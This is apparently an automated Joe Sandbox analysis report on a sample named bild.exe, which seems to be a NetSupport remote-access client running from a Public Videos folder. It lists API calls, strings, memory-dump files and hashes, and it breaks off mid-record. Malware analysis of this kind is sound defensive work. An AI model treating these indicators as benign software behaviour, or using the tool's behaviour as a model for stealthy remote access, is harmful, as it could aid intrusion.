                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterLeaveSleep
                                                                                      • String ID: Push
                                                                                      • API String ID: 1566154052-4278761818
                                                                                      • Opcode ID: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                      • Instruction ID: e8f6e055aac827a13dfabc2dec6ad808bd843e21556e42594c7620890779e76f
                                                                                      • Opcode Fuzzy Hash: a72291858ce6dc6b0c64ae6c986eadc989c908336576dbf916d062231e355c4c
                                                                                      • Instruction Fuzzy Hash: 1B51CC78E04784DFE721DF64C880B8AFBE0EF09318F1546A9D8998B285D770BC84CB91
                                                                                      Function 00821020 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCommandLineA.KERNEL32 ref: 00821027
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 0082107B
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,?), ref: 00821096
                                                                                      • ExitProcess.KERNEL32 ref: 008210A3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3580718425.0000000000821000.00000020.00000001.01000000.00000009.sdmp, Offset: 00820000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3580699277.0000000000820000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_820000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                      • String ID:
                                                                                      • API String ID: 2164999147-0
                                                                                      • Opcode ID: c991ff5fe9495dac9077eac087fcc46d835ac97b2e3568effc64c1c7ab0a7172
                                                                                      • Instruction ID: 0fb08f1a121fe326dc4a69f0c291b27bafe659ddb1223e100090448ec86538e8
                                                                                      • Opcode Fuzzy Hash: c991ff5fe9495dac9077eac087fcc46d835ac97b2e3568effc64c1c7ab0a7172
                                                                                      • Instruction Fuzzy Hash: 7611A120404BE46AEF315F64A88CBEABFA5FB22780F340044E8D6D6146D25648C7C7A5
                                                                                      Function 110306E7 Relevance: 6.0, APIs: 4, Instructions: 36synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                      • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                      • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseHandle$FreeLibraryObjectSingleWait
                                                                                      • String ID:
                                                                                      • API String ID: 1314093303-0
                                                                                      • Opcode ID: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                      • Instruction ID: 8e76f7fb4e107f93cb89770177b2081f40004907d07b5dfd0c3c9c847909df3d
                                                                                      • Opcode Fuzzy Hash: 7d2e314c4a79abf06013014507abe82da34b4e69185c6a4a9ad4d68e1235ff59
                                                                                      • Instruction Fuzzy Hash: A7F08135E1425ADFE714DF60D889BADF774FB88319F0002A9D82A52180DF355940CB50
                                                                                      Function 11143C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Public\Videos\Video\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CurrentFileModuleNameProcess
                                                                                      • String ID: C:\Users\Public\Public\Videos\Video\bild.exe
                                                                                      • API String ID: 2251294070-1016564174
                                                                                      • Opcode ID: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                      • Instruction ID: b9aa28b4973dc8f7500fb142756b1fa860f28402029a3e5f5efe4e67c4e883a6
                                                                                      • Opcode Fuzzy Hash: 723324e2a123dfbea80ddcbfb8a880b064ecb9608f963ee43b1e571dd00f4a9e
                                                                                      • Instruction Fuzzy Hash: F811E7747282235BE7149F76C994719F7A5AB40B5DF20403EE819C76C4DB71F845C744
                                                                                      Function 1110F4A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 1110F4A9
                                                                                        • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                        • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                        • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                      • _memset.LIBCMT ref: 1110F4D2
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateErrorExitHeapLastMessageProcess_malloc_memsetwsprintf
                                                                                      • String ID: ..\ctl32\Refcount.cpp
                                                                                      • API String ID: 2803934178-2363596943
                                                                                      • Opcode ID: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                      • Instruction ID: 747f5be640ff5df7f7be77ac0748be8e5b1ae2afb2ba592a3adef8646797d69b
                                                                                      • Opcode Fuzzy Hash: 1dad7423e7d09c371aaf82e5f4f0c79299b8a2cfda0255715acc90ffe98602aa
                                                                                      • Instruction Fuzzy Hash: B5E0C23AE4013933C112258A2C03FDBF69C8BD19FCF060021FE0CAA201E586B55181E6
                                                                                      Function 11014FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102EFB6,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 11014FE7
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11014FF8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle
                                                                                      • String ID: \\.\NSWFPDrv
                                                                                      • API String ID: 3498533004-85019792
                                                                                      • Opcode ID: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                      • Instruction ID: 0b573536b28af4079515d3142ca801f5deca53cbeb6a996f0a1660ae0aa1d84a
                                                                                      • Opcode Fuzzy Hash: f0badf7843dd101c9c7a596aad23f33c11cadc83e0c29f65da520d4fe63b43e1
                                                                                      • Instruction Fuzzy Hash: A9D0C971A051387AF23416B66C4CFC7AD09DF06BB5F210264B53DE11D886104C41C2F1
                                                                                      Function 1115BDE0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _calloc
                                                                                      • String ID:
                                                                                      • API String ID: 1679841372-0
                                                                                      • Opcode ID: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                      • Instruction ID: 0024421513bb2e1abb717dbf2ce3cdefbb73aa1ee3cdb3a5feae03928f974db8
                                                                                      • Opcode Fuzzy Hash: 9cedd041eecb3df7698fbc33d80b44fc007d69f78d2f5524ab9bd2bf2492814b
                                                                                      • Instruction Fuzzy Hash: 8C519E7560020AAFDB50CF68CC81FAAB7A6FF8A704F148459F929DB280D771E901CF95
                                                                                      Function 11111430 Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111145A
                                                                                      • __wsplitpath.LIBCMT ref: 11111475
                                                                                        • Part of subcall function 11169044: __splitpath_helper.LIBCMT ref: 11169086
                                                                                      • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111114A9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DirectoryInformationSystemVolume__splitpath_helper__wsplitpath
                                                                                      • String ID:
                                                                                      • API String ID: 1847508633-0
                                                                                      • Opcode ID: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                      • Instruction ID: 71a9510f599fa1c136cb45ff21797ad5c5790827a759e4d2b52c0b71367846c8
                                                                                      • Opcode Fuzzy Hash: 7498e584b69856d4904a5e87c0faea6464729445070a8fc0c411536d822b12a4
                                                                                      • Instruction Fuzzy Hash: 34116175A4021DABEB14DF94CD42FE9F378AB48B04F404199E7246B1C0E7B12A48CB65
                                                                                      Function 1109E9E0 Relevance: 4.5, APIs: 3, Instructions: 29COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                        • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,1102FCB2,?,00000000), ref: 1109E948
                                                                                        • Part of subcall function 1109E910: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109E964
                                                                                        • Part of subcall function 1109E910: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,00F5DEA0,111EEB64,?,00000001,00000001), ref: 1109E990
                                                                                        • Part of subcall function 1109E910: EqualSid.ADVAPI32(?,00F5DEA0,?,00000001,00000001), ref: 1109E9A3
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Token$InformationProcess$AllocateCloseCurrentEqualHandleInitializeOpen
                                                                                      • String ID:
                                                                                      • API String ID: 2256153495-0
                                                                                      • Opcode ID: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                      • Instruction ID: 36b54363b319bb335bc5da0d0e9bdd0405b18079b131e91390d3ecc07929186c
                                                                                      • Opcode Fuzzy Hash: 3278d9adbe4d3509b3b3548b9dad78e2718189f4cc0d765404142b0664a012dd
                                                                                      • Instruction Fuzzy Hash: DCF05E78A15328EFD709CFF5D88482EB7A9AF08208700447DF629D3205E631EE009F50
                                                                                      Function 11068950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11068A12
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID: ??CTL32.DLL
                                                                                      • API String ID: 1029625771-2984404022
                                                                                      • Opcode ID: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                      • Instruction ID: 38d720fc7c26638894156a2f8924bac31edb6b50614c34829f37a9a02c5b1e22
                                                                                      • Opcode Fuzzy Hash: f114da26ba1a202df3ee97640f196ffb6169a957819133968d89773a25347f90
                                                                                      • Instruction Fuzzy Hash: 5831F5B2A04781DFE711CF59DC40B5AF7E8FB45724F0482AAE92897380E735A900CB92
                                                                                      Function 11026B40 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 11026B6D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: DriveType
                                                                                      • String ID: ?:\
                                                                                      • API String ID: 338552980-2533537817
                                                                                      • Opcode ID: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                      • Instruction ID: c0198090b602517e4922a9d0df48f1c050a77905515f879100581957a4b6d58d
                                                                                      • Opcode Fuzzy Hash: b7a90a31e7e06615914d848c67eda86d39421f745c303f5cb5263aa0826e519a
                                                                                      • Instruction Fuzzy Hash: 64F09065C083DA2AEB23DE608844596BFE84B463A8F5488D9DCE887541D165E1C58791
                                                                                      Function 110ED1A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 110ED160: RegCloseKey.KERNEL32(?,?,?,110ED1AD,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED16D
                                                                                      • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,1103053F,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED1BC
                                                                                        • Part of subcall function 110ECF40: wvsprintfA.USER32(?,00020019,?), ref: 110ECF6B
                                                                                      Strings
                                                                                      • Error %d Opening regkey %s, xrefs: 110ED1CA
                                                                                      Memory Dump Source
